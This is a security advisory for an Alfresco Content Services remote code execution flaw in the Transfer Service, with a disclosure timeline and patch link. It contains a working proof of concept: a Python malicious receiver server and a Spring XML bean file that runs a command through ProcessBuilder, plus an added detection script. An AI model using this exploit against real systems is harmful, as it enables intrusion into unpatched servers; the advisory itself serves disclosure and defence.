Alfresco Content Services
Affecting versions prior to 23.3.0.23
The issue has been fixed in version 23.3.0.23
CVE-2024-29309
Remote Code Execution
Alfresco Content Services has a remote code execution (RCE) vulnerability in the Transfer Service.
The vulnerability stems from a feature in the Transfer Service, which allows the configuration of the properties Endpoint Host and Endpoint Port for transfer folders. An attacker can exploit this by setting up a malicious Transfer Receiver, then configuring the Endpoint Host and Endpoint Port of the transfer folders to this malicious service.
Pointing the Endpoint Host and Endpoint Port of a transfer folder at such a malicious Transfer Receiver could lead to arbitrary code execution on Alfresco Content Services (ACS). Here are the detailed steps:
Refer to the official documentation
In the source repository, create a new folder in Company Home > Data Dictionary > Transfers > Transfer Target Groups > Default Group.
In the New Folder window specify a name, for example, Replica. You can add a title, and description of the new folder, if you wish.
A rule defined on the Default Group folder specializes the type of any folder created in it. The type is set automatically by the folder rule to trx:transferTarget. This allows you to add the required properties to define the replication target through the user interface.
Click Edit Properties on your new folder (Replica).
Specify the required properties:
- Specify the Endpoint Host, Endpoint Port, Username and Password.
- Click Enabled and Save.
Enable the replication service in your alfresco-global.properties file:
replication.enabled=true
and restart the source repository.
Here, the Endpoint Host and Endpoint Port are set to the address of the malicious server. Next, the attacker sets up two files to act as the malicious server.
from http.server import BaseHTTPRequestHandler, HTTPServer

class MyServer(BaseHTTPRequestHandler):
    def handle_request(self):
        if self.path == '/evil.xml':
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            with open('evil.xml', 'r') as file:
                self.wfile.write(bytes(file.read(), 'utf-8'))
        else:
            self.send_response(500)
            self.send_header('Content-type', 'application/json')
            self.end_headers()
            self.wfile.write(bytes('{"errorType":"org.springframework.context.support.ClassPathXmlApplicationContext","errorMessage":"http://Endpoint Host:Endpoint Port/evil.xml"}', "utf-8"))

    def do_GET(self):
        self.handle_request()

    def do_POST(self):
        self.handle_request()

def run(server_class=HTTPServer, handler_class=MyServer, port=7575):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print(f'Starting httpd on port {port}...')
    httpd.serve_forever()

if __name__ == "__main__":
    run()
evil.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <value>touch</value>
                <value>/tmp/siebene</value>
            </list>
        </constructor-arg>
    </bean>
</beans>
touch /tmp/siebene was executed here.
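The error body returned by the malicious receiver above names a class outside the transfer packages in errorType and carries a URL in errorMessage, which makes it easy to flag. The following is an added example, not part of the original advisory or of Alfresco's code, that reviews receiver error bodies for those two signs. The allowlisted package prefix, the function name and both sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Assumption: genuine receivers only report exception classes from this
# package; replace with the types your own receivers actually return.
ALLOWED_ERROR_TYPE_PREFIXES = ("org.alfresco.service.cmr.transfer.",)
JAVA_CLASS_NAME = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
URL_LIKE = re.compile(r"\b[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Constructed sample bodies (not captured traffic). The first mirrors the
# response shape shown above, with a placeholder host.
SAMPLE_SUSPICIOUS = (
    b'{"errorType":"org.springframework.context.support.'
    b'ClassPathXmlApplicationContext",'
    b'"errorMessage":"http://receiver.example:7575/evil.xml"}'
)
SAMPLE_EXPECTED = (
    b'{"errorType":"org.alfresco.service.cmr.transfer.TransferException",'
    b'"errorMessage":"constructed.sample.message.id"}'
)


def review_error_response(body: bytes) -> list:
    """Return findings for one receiver error body; empty list means clean."""
    try:
        doc = json.loads(body.decode("utf-8"))
    except ValueError:  # covers UnicodeDecodeError and JSONDecodeError
        return ["body is not valid UTF-8 JSON"]
    if not isinstance(doc, dict):
        return ["body is not a JSON object"]
    findings = []
    error_type = doc.get("errorType")
    if not isinstance(error_type, str) or not JAVA_CLASS_NAME.match(error_type):
        findings.append("errorType missing or not a class name")
    elif not error_type.startswith(ALLOWED_ERROR_TYPE_PREFIXES):
        findings.append("errorType outside allowlist: " + error_type)
    message = doc.get("errorMessage")
    if isinstance(message, str) and URL_LIKE.search(message):
        findings.append("errorMessage contains a URL")
    return findings


if __name__ == "__main__":
    for name, body in (("suspicious", SAMPLE_SUSPICIOUS), ("expected", SAMPLE_EXPECTED)):
        print(name, review_error_response(body))
```

The check can be run over response bodies recorded from the repository's outbound transfer traffic, for example at an egress proxy.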
https://github.com/Alfresco/alfresco-community-repo/commit/c31158a11303a0da88e3ba22be387f6ef21493ae
March 7th: Sent the report to security@alfresco.com
April 3rd: Patch submitted to the GitHub repository
April 11th: Received a response, claiming that the report has been received